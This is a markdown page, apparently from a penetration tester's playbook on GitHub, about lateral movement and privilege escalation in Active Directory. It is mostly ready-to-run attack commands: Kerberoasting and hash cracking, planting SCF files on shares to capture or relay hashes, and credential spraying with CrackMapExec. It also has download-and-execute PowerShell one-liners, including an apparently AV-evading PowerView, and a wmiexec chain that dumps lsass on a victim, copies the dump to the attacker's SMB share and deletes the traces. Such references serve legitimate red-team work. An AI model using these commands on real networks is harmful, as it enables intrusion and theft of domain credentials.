Skip to content

Latest commit

 

History

History
175 lines (107 loc) · 5.18 KB

6 - Lateral-Movement-and-Privilege-Escalation.md

File metadata and controls

175 lines (107 loc) · 5.18 KB

All in one AD enumeration script

https://github.com/CasperGN/ActiveDirectoryEnumeration

Kerberoast

From Linux:

Get hashes using impacket

GetUserSPNs.py -request -save -dc-ip <IP> domain/user

From Windows:

RiskySPN: https://github.com/cyberark/RiskySPN

Crack:

Hashcat:

hashcat1 -m 13100 -r rules/<rule> <hashes file> wordlists/<wordlist>

Plant SCF files on file shares to get hashes or SMB relay

Find shares:

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1"

CrackMapExec --shares module, grep output for WRITE.

Plant scf file on share using cme --scuffy module, or manually create a text file ending with ".scf" extension with the following data:

[Shell]
Command=2
IconFile=\\[your IP address]\share\pentest.ico
[Taskbar]
Command=ToggleDesktop

Use Metasploit SMB server module or Responder to capture/crack or relay hashes. Using Responder, make sure to use the "--lm" option so that when you capture NTLMv1 hashes you can convert to NT hashes using crack.sh.

Spray creds for admin access using CrackMapExec

cme smb [/path/to/FileWithIPsOrNetworks] -u [username] -p [password] | tee /path/to/logfile.log

Note: If using a local account, add the --local-auth option. If using a hash instead of password, use -H [hash] instead of -p.

PowerView

Note: This links to my copy of PowerView.ps1 from PowerSploit which has been highly modified to bypass AV.

Note: You can find a Python version of PowerView which can be run remotely from a Linux system here: https://github.com/the-useless-one/pywerview

Prep work if running from a non domain computer:

Start the 'Windows Remote Management' service.

Start PowerShell as administrator.

Enter:

cd WSMAN:\localhost\client\
Set-Item TrustedHosts -Value *.[domain.com]
runas /netonly /user:[domain.com]\[user] powershell.exe

Invoke-UserHunter

All Domain Admins:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');_/===\_/\_/=\__/\_ -CheckAccess

Single User:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1');_/===\_/\_/=\__/\_ -UserName <username> -CheckAccess

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1’);Invoke-ShareFinder"

Find all members of a group

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/sdcampbell/Internal-Pentest-Playbook/master/code/PoPow.ps1’);_/===\_/\_/=\__/\_ -GroupName <group>"

BloodHound

Installation and walkthrough

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Collection

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-Bloodhound -CollectionMethod all,loggedon

PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange: https://github.com/dirkjanm/privexchange/

Find Domain Admin sessions and dump credentials

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess

Note: I don't use Mimikatz on production systems. I dump lsass.exe and use Mimikatz on a system that I control to dump creds from the dump file.

Requires Impacket and pypykatz

Install pypykatz:

pip3 install pypykatz

Run Impacket smbserver.py:

./smbserver.py <share name> <path to directory where you have procdump64.exe>

Run Impacket wmiexec.py:

./wmiexec.py <domain>/<username>:<password>@<Victim IP> 'copy \\<PTK IP>\<share>\procdump64.exe . & procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp & copy lsass.dmp \\<PTK IP>\<share>\ & del lsass.dmp & del procdump64.exe'

Dump credentials from lsass dump file

pypykatz lsa minidump lsass.dmp

Note: Sometimes you may get an error when using pypykatz. In that case you'll have to copy the dump file to a Windows system under your control and use Mimikatz.

Using native PowerShell cmdlets:

PowerShell script to use ActiveDirectory module without installing RSAT

Install-ActiveDirectoryModule -DllPath [path] -ADModulePath [path]

Enumerate domain information

Get-ADDomain
(Get-ADDomain).DomainSID.Value

Find Domain Controllers

Get-ADDomainController

Enumerate Domain Users

Get-ADUser -Filter * -Properties * | select name
Get-ADUser -Server [server fqdn]
Get-ADUser -Identity [username]

Get Domain Groups

Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter {Name -like "*adm*"} | select Name

Get all the members of the Domain Admins group

Get-ADGroupMember -Identity "Domain Admins" -Recursive

Get user's group membership

Get-ADPrincipalGroupMembership -Identity [username]

Get all domain computers

Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter * | -Properties *